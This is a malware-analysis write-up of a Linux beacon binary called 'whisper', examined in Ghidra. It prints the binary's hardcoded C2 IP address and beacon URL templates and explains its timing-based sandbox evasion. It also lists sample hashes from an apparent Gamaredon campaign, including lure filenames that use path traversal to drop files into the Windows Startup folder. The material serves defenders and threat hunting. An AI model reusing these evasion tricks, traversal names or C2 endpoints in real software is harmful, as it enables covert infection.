whisper.armv6	90bf143a03e0cb6686c32a8a77dbdad6a314a16b7991823f45f7d9cb22ba51bc
whisper.armv7	2679b37532e176d63c48953cb9549d48feb76f076222cb6502034b0f72ca7db1
whisper.i686	326952154ef5a81c819d67f9408e866af5fe2cdb3024df3ef1d650a9932da469
whisper.m68k	0f1fd9f0a99693ec551f7eb93b3247b682cb624211a3b0c9de111a8367745268
whisper.mips	d37b334ec94b56236dc008108d4a9189019f1849fb010dcf08cfcf1a7d199b53
whisper.mips64	1afcdc3210b47356a0f59eeffbc2f7be22c1dd7aa2cc541c0eb20db29da8280e
whisper.mips64le	fa96cf3b0022711627b97d569f0c6e28cfd62e7051fdce3f0165f8dd5c4ec760
whisper.mips64len32	31f781726cc8cfc002b847fc0f05a7e28ebecea95f5a03b1cdeb63cce3e9ed8c
whisper.mips64n32	3615d10d1ef6e57b66aa653b158cd8d57166d69cbc4c90c2b7b9dd29820fcc64
whisper.mipsle	b4658234a5c300bce3fe410a55fc87a59e4be7d46f948eaff389c4c16016afaa
whisper.powerpc440fp	ff08d2c7f8b5679add11dd4a297dd40a0d597e92e307ccd9c0d36366b59e3c6f
whisper.powerpc64e5500	af7893318f1fe0d60cff62dbebe434e5f8c42bf1b338db23858177e880894574
whisper.powerpc64e6500	7234970698fab486e210a65aa2a3d3daebd3eebcf4bf016e9670fa725c07d76a
whisper.powerpc64lepower8	90f5ccd40e0f737eb40dcf292f202c7c70f1cdc2d33bd6718c0b286007f3ce24
whisper.powerpc64power8	938205ed2f664fc330e20580799445182ba840672ef8bd75ae7629e07a460a79
whisper.powerpce300c3	b2b811bbfe06d0edba85e0b0d42dbffb3714dee5bdd44426a1cb4589874d3234
whisper.powerpce500mc	c43f32a066112fd87f43895515d27116e40688ae47b02ce0a5b379672830a136
whisper.riscv32	61db3883d792b518450a4a67cfaa4d14baec59239a967ffb30c7a116a39f00e6
whisper.riscv64	1a60918639c961f6814f4dc74751a926361841b66c837d544697be1d3f42594e
whisper.sh4	3ac847bc1351ea5275d30cf9186caf607021d7f1da1a4cafeff6886b87844f36
whisper.sparc	9033caaa07477bbed8ccd9f130fd8353a81143db44555b734ed1547ef368a8dd
whisper.sparc64	00a290ee2458e38a0ec78be1414f651612c51831ff741cb40d5c6a11b29a6d7c
whisper.x64	4dd0005c6e6d4eca722ed02fec17a689828754a66a107272c5cd62f2fec478e1

For my analysis I’ll focus on the file whisper.x64.

It’s a stripped ELF binary, a binary that has had debugging symbols and symbol names removed. That makes analysis a bit harder, but not impossible. First step: upload the file to VirusTotal.

This was the first submission of the file on VirusTotal, so there is no historical data. Several scanners flagged the binary as a DDoS agent. To find out what it actually does at runtime, I opened it in Ghidra and started looking at functions. First I checked the strings embedded in the binary.

Already we can see some interesting strings, for example:

DEFINED

0040a000

s_31.170.22.205_0040a000

ds “31.170.22.205”

“31.170.22.205”

string

false

DEFINED

0040a012

s_/add.php?v=%u&a=%s&o=%u&e=%u_0040a012

ds “/add.php?v=%u&a=%s&o=%u&e=%u”

“/add.php?v=%u&a=%s&o=%u&e=%u”

string

false

DEFINED

0040a050

s_/ping.php?v=%u&a=%s&e=%u&c=%u_0040a050

ds “/ping.php?v=%u&a=%s&e=%u&c=%u”

“/ping.php?v=%u&a=%s&e=%u&c=%u”

string

true

From these strings we can infer a few capabilities:

add.php: registers the client at the C2 server
ping.php: sends a ping / heartbeat to the C2 server

Next I examine syscalls to get a clearer picture of the binary’s behavior.
If you want to get an overview of x64 syscalls, you can find them here.

0x31 is the syscall number for sys_bind, so we can infer socket-related functionality. I renamed the function to socket_bind in Ghidra (right-click > Rename Function) and then checked the incoming calls to see where it is used.

After jumping to function FUN_004012b1 we see the following code:

To bind a socket via syscall we need to look at the sockaddr_in layout for x64:

struct sockaddr_in {
    short            sin_family;   // e.g. AF_INET
    unsigned short   sin_port;     // e.g. htons(3490)
    struct in_addr   sin_addr;     // see struct in_addr, below
    char             sin_zero[8];  // zero this if you want to
};

Offset 0 (2 bytes): sin_family (2 / AF_INET)
Offset 2 (2 bytes): sin_port – this is where param_1 lands
Offset 4 (4 bytes): sin_addr – here it’s 0 (INADDR_ANY)

So local_28 corresponds to sin_family, local_24 to sin_addr, and local_26 to sin_port. I renamed the variables accordingly and gave the function the name create_socket.

FUN_004036d3 likely creates the socket. We can confirm that by searching inside it for syscall 0x29 (which is sys_socket). That matches, I renamed that function and fleshed out the code.

This confirms our assumption, so I can also give this function a name and complete the code as far as possible.

We still didn’t know which port this socket uses, so I looked at incoming references and found it’s called only from FUN_00401020.

That function is invoked right after the entry point, it’s effectively main. From the line iVar2 = create_socket(0x5d15); we can infer the port. 0x5d15 in the binary is not the final port number: it’s an unsigned short that gets converted with htons from host byte order to network byte order.

whisper > printf "%d\n" $(( ((0x5d15 & 0xff) << 8) | ((0x5d15 >> 8) & 0xff) ))
5469

You can convert it in bash or compute by hand: because htons swaps the two bytes on little-endian hosts, 0x5d15 becomes 0x155d, which is 5469 in decimal. This is a common pattern used, for example, to avoid running two copies of the malware, but it could also be used as a communication channel. To check that, I searched for the sys_listen syscall (0x32). There is no listen syscall in the binary, so it’s safe to assume this is an execution lock rather than a listening server. The decompiled code also confirms this.

iVar2 is the return status of the socket creation; if iVar2 == -1 socket creation failed and the program exits.

Now let’s look more closely at the block of code that follows a successful socket creation. I’ll skip FUN_0040123 and FUN_00401246 because they only initialize and destroy a buffer, they don’t add relevant functionality.

To understand the logic I examined four helper functions: FUN_0040120a, FUN_004013c6, FUN_004014e2, and FUN_00404634. I started with FUN_00404634 because it has the most incoming references.

This one is most likely a sleep function. If param_1 == 0 nothing happens, that’s typical for sleep wrappers. If param_1 != 0, the routine calls into the kernel through several helper calls and performs a timed wait.

Inside it calls FUN_00404f1f(0x11, 0, local_28), that’s a wrapper for a syscall. The parameter 0x11 is the syscall we care about; on x86-64 that’s sys_rt_sigtimedwait. rt_sigtimedwait lets you wait for signals with a timeout, so the code can sleep while still being able to respond to signals (from another thread, an IPC, or a realtime signal). Many analysis and monitoring tools hook libc sleep functions like nanosleep(); by using direct syscalls the malware can bypass those hooks and make runtime analysis harder.

After that the code performs what looks like a timer or remaining-time check, it computes elapsed time or remaining time and returns that value. I renamed this helper to sleep for clarity.

FUN_0040120a

FUN_0040120a uses syscall 0xc9, which is a time-related syscall. The function measures elapsed time across a 10-second delay, a typical sandbox-evasion trick. The code checks the difference and only executes the following block if the delta indicates the sleep actually occurred. I renamed this to time_passed_check.

FUN_004013c6

FUN_004013c6 is straightforward: it performs a GET request to the C2’s add.php. That is the client registration step. The GET parameters v, a, o, and e map roughly as follows:

v: fixed value
a: CPU architecture (agent string)
o: fixed value
e: the value passed to the binary at execution time

I renamed the function to add_client.

`FUN_004014e2`

The last function, FUN_004014e2, is similar to add_client. It sends a ping to the C2 server and returns a boolean indicating success or failure. I renamed it ping_cnc.

I’ve now analyzed and named all four helper functions used by FUN_0040125c.
Here’s the result:

Step-by-step:

First, the binary checks the result of the time-check. If that check passes, it registers the client with the C2.

Afterwards, the binary pings the C2 server every 300 seconds. The loop contains a counter that runs 576 iterations in total. The full runtime is therefore limited to exactly 48 hours (300 * 576 = 172,800 seconds = 48 hours). I named the overall routine add_and_ping.

Looking into the main function, we now have a structure that ties everything together:

Note: I intentionally didn’t discuss every single helper; I renamed the lesser functions for clarity but didn’t dig into those that aren’t relevant to this write-up.

Conclusion

The binary’s functionality is limited. On startup it runs a time-difference check designed to detect sandboxing, using sys_rt_sigtimedwait to make sleep detection harder. If the sample concludes the timing check is okay, it registers with the C2 and then pings the C2 every five minutes for 48 hours. This is a beacon-only sample with no additional backdoor capabilities in the analyzed build.

Interpretations

Because the attacker used multiple techniques to keep their real binaries out of standard analysis, this likely serves as a sandbox-evasion measure. The operator can watch the incoming pings from infected machines and, after confirming persistent, consistent check-ins over the 48-hour window, choose targets for a follow-up payload deployment. That prevents premature sandboxing and analysis of the actual payloads.

An argument against that theory is the lack of any attempt to establish persistent access in this sample, that would make later deployment harder if defenders notice and block the operation early.

Another hypothesis is that the operator collects telemetry to detect whether the binary is being detected and if it survives for a desired runtime. That would explain the lack of persistence attempts, but I consider this less likely because there are more efficient ways to perform that kind of telemetry.

References:

Small Analysis by previous Version of the Binary: https://ducklingstudio.blog.fc2.com/blog-entry-419.html
Github: https://github.com/Mr128Bit/Whisper-beacononly-c2client/tree/main
Malshare Links:
- Coming Soon
Virustotal Scans:

Sample	Hash	Dropped Files
e4258bdfa82a1065aa1095ae2c6da4240f6ebe20ba285e56f1e216eec5984510.hta	e4258bdfa82a1065aa1095ae2c6da4240f6ebe20ba285e56f1e216eec5984510
fc249b4686f4cfd98ab016aac32ecccf947012321a321d8e6463c17401b0c700.zip	fc249b4686f4cfd98ab016aac32ecccf947012321a321d8e6463c17401b0c700	2-1180-25_24.06.2025.HTA
eed1ab171c449173059d2c5955e6ddfa73aaf952c612210b82c85137f42e01b8.zip	eed1ab171c449173059d2c5955e6ddfa73aaf952c612210b82c85137f42e01b8	2-1180-25_24.06.2025.HTA
478604b0f9323082b61521045a310b3362f405a0781a735dfe72f8ffed054be7.zip	478604b0f9323082b61521045a310b3362f405a0781a735dfe72f8ffed054be7	2-1180-25_24.06.2025.HTA
68314e93b47d774e378d4c573f08417bf40ead61caaeafbc128c3c6dff96ae0c.rar	68314e93b47d774e378d4c573f08417bf40ead61caaeafbc128c3c6dff96ae0c	Звернення народного депутата Верховної Ради України IX скликання 11-2967-25_23.09.2025.HTA 11-2967-25_23.09.2025.pdf
82e05b396443fcedeb4b165a8e5ee4d85195b4ba0a58a085670525598e46eedd.zip	82e05b396443fcedeb4b165a8e5ee4d85195b4ba0a58a085670525598e46eedd	82e05b396443fcedeb4b165a8e5ee4d85195b4ba0a58a085670525598e46eedd.rar Письмо.pdf Письмо.pdf:.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_run.bat Письмо.pdf:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Письмо.pdf:stream_12xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
7b936b2885c3b02243d7cbf751f341840f26cd0de7d4910843159fbc05e1db60.rar	7b936b2885c3b02243d7cbf751f341840f26cd0de7d4910843159fbc05e1db60	Передати засобами АСУ Дніпро_6_3_4_4265_17.11.2025.pdf Передати засобами АСУ Дніпро6_3_4_4265_17.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_6_3_4_4265_17.11.2025.HTA
05f23e5c668c73128b6140b2d7265457ce334072a0b940141a839ec3e7234414.rar	05f23e5c668c73128b6140b2d7265457ce334072a0b940141a839ec3e7234414	Передати засобами АСУ Дніпро_9_5_5_433_17.11.2025.pdf Передати засобами АСУ Дніпро9_5_5_433_17.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_9_5_5_433_17.11.2025.HTA
83141b865be20f01dbb8520577500f57ec26357153ee093c5ba46f787aab7f7c.lnk	83141b865be20f01dbb8520577500f57ec26357153ee093c5ba46f787aab7f7c
331eedee2d5df87c46b93b719ca623aeebafc91157d70ffe381cd1c06ae46841.rar	331eedee2d5df87c46b93b719ca623aeebafc91157d70ffe381cd1c06ae46841	.Довiдка щодо невиконання….lnk Довiдка щодо невиконання….docx
237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0.rar	237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0	Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf Передати засобами АСУ Дніпро2_7_4_62_13.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_7_4_62_13.11.2025.HTA
a1832e9c58b9b3d355775ecaa6567d9727f4a39cf372fa9c7c2b42d70e98d0e1.rar	a1832e9c58b9b3d355775ecaa6567d9727f4a39cf372fa9c7c2b42d70e98d0e1	Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf Передати засобами АСУ Дніпро3_8_2_7442_13.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_3_8_2_7442_13.11.2025.HTA
d9fec61a4b1bb0ee158e65a7cea8c8098bf1ea2117289a48c2ae9e373bb50e22.rar	d9fec61a4b1bb0ee158e65a7cea8c8098bf1ea2117289a48c2ae9e373bb50e22	Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf Передати засобами АСУ Дніпро2_1_1_7755_12.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_12.11.2025.HTA
95d30188fcc3864a6c8f9c01e27a588ea2b456f55b737c27f4b0cd756b887013.hta	95d30188fcc3864a6c8f9c01e27a588ea2b456f55b737c27f4b0cd756b887013
6aa9741f8b8629d0398049fa91dc5e7c28fd0d63bc76b3fd9be2dc196265263f.rar	6aa9741f8b8629d0398049fa91dc5e7c28fd0d63bc76b3fd9be2dc196265263f	Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf Передати засобами АСУ Дніпро2_1_1_7755_11.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_11.11.2025.HTA
0cebe68cbe06a390acee24c33155bb1d9910d4edcb660d0d235ce2a4e3c643c5.hta	0cebe68cbe06a390acee24c33155bb1d9910d4edcb660d0d235ce2a4e3c643c5
c7726c166e1947fdbf808a50b75ca7400d56fa6fef2a76cefe314848db22c76c.zip	c7726c166e1947fdbf808a50b75ca7400d56fa6fef2a76cefe314848db22c76c	Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf:.........._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_11.11.2025.HTA
5437c7bc4423b8acb8a6646ac2cd5379101ac73b6011549b25f1cd95bb333cea.rar	5437c7bc4423b8acb8a6646ac2cd5379101ac73b6011549b25f1cd95bb333cea	Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf:.........._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_10.11.2025.HTA
21ad5d05a43d599b6225cd883b10356f4b8cd465a2fcb2745d90cfa65c6cffa1.rar	21ad5d05a43d599b6225cd883b10356f4b8cd465a2fcb2745d90cfa65c6cffa1	Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf Перегляд підходів до призову під час мобілізації2-3716-25_07.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2-3716-25_07.11.2025.HTA
7a1417492979f569747bf11211bf523d5479c163e717651ebba20ad73834b8bb.hta	7a1417492979f569747bf11211bf523d5479c163e717651ebba20ad73834b8bb
18c4d384f8fef858accb57fff9dc4036bf52a051b249696b657162b1adcbf104.hta	18c4d384f8fef858accb57fff9dc4036bf52a051b249696b657162b1adcbf104
f35a91aa6b720f33fb971deee228e48a07d51df9762de6d616481fad1008b7ea.htm	5a8aada4bbc37d79f93349587a639f322eb4d068dd0c5b8131d3b69cf9c833e0
5a8aada4bbc37d79f93349587a639f322eb4d068dd0c5b8131d3b69cf9c833e0.zip	5a8aada4bbc37d79f93349587a639f322eb4d068dd0c5b8131d3b69cf9c833e0	2-13476-2025_08.09.2025.pdf Повістка про виклик до військового комісаріату 2-13476-2025_08.09.2025.HTA
27bd90199e426719d1c3ef214215a17fae23f257d8bcb7a806e394e8666158f0.hta	27bd90199e426719d1c3ef214215a17fae23f257d8bcb7a806e394e8666158f0
3611035faf63b8bf14c88a9bd02e3783f2bde3128c97f6317d4d4c912463ef39.xhtml	3611035faf63b8bf14c88a9bd02e3783f2bde3128c97f6317d4d4c912463ef39
2-1180-25_03.06.2025.HTA	9ce60dde11c1ad72af22ccd774c0efe9c5a206e9dcfbc2388a1b09cc70747f09
2f3b6223e31562592e86ae4dd4a5d0ceff518cf4feeb98f796febcb66d9148c4.zip	2f3b6223e31562592e86ae4dd4a5d0ceff518cf4feeb98f796febcb66d9148c4	Perelik_dokumentiv.txt.lnk raport-na-otrimannya-dovidki-pro-obstavini-travmi.pdf
2-1180-25_24.06.2025.HTA	ab54862f180b379cb8d612fbb22891402e7d55151dba87e7b11e45c5e45b6d7c

Synaptic Security Blog

Campaign Summary

Dataset Overview

Operational Objective of the Campaign

Campaign Timeline

Campaign Description

What happens?

Infection Chain (CVE-2025-6218 & CVE-2025-8088)

1. Initial Access: Web-based Loaders

CVE-2025-6218

CVE-2025-8088

2. Pteranodon Loader

Persistence Mechanisms

Communication Structure

3. Access Control Logic (C2 Firewall)

Purpose of the Access Control Logic

Stages

Stage 1: IP Validation

Stage 2: Header Validation

Stage 3: Registration & Tasking

4. Campaign Characteristics

Analysis

Key observations from sandboxing

Telegram & graph.org C2 Distribution

Fast-Flux Infrastructure (194.67.71.0/24)

Findings:

Changes in the 2025 Gamaredon Campaign

1. Zero-Click via CVE-2025-6218

2. RAR-First Delivery

3. More complex access control

4. Decentralized C2

5. Expanded Stage-1 variations

6. Stronger persistence & propagation

Summary

MITRE ATT&CK Mapping

TA0001 – Initial Access

TA0002 – Execution

TA0003 – Persistence

TA0004 – Privilege Escalation

TA0005 – Defense Evasion

TA0006 – Credential Access

TA0010 – Exfiltration

TA0011 – Command and Control

TA0009 – Collection

TA0008 – Lateral Movement / Propagation

High-Level Indicators for Threat Hunters

1. Network Indicators

2. File System Indicators

3. Registry Indicators

4. Process Indicators

5. Anti-Analysis / Sandbox Indicators

6. Tactical Patterns

7. Runtime Indicators (Sysmon/SOC)

IOCs

Samples leveraging CVE-2025-6218

Infrastructure used in the 2025 Ukraine Campaign (so far)

Recommendations for Defenders and Blue Teams

IOC

Final Script

Description

FUN_0040120a

FUN_004013c6

FUN_004014e2

Conclusion

Interpretations

References:

`FUN_004014e2`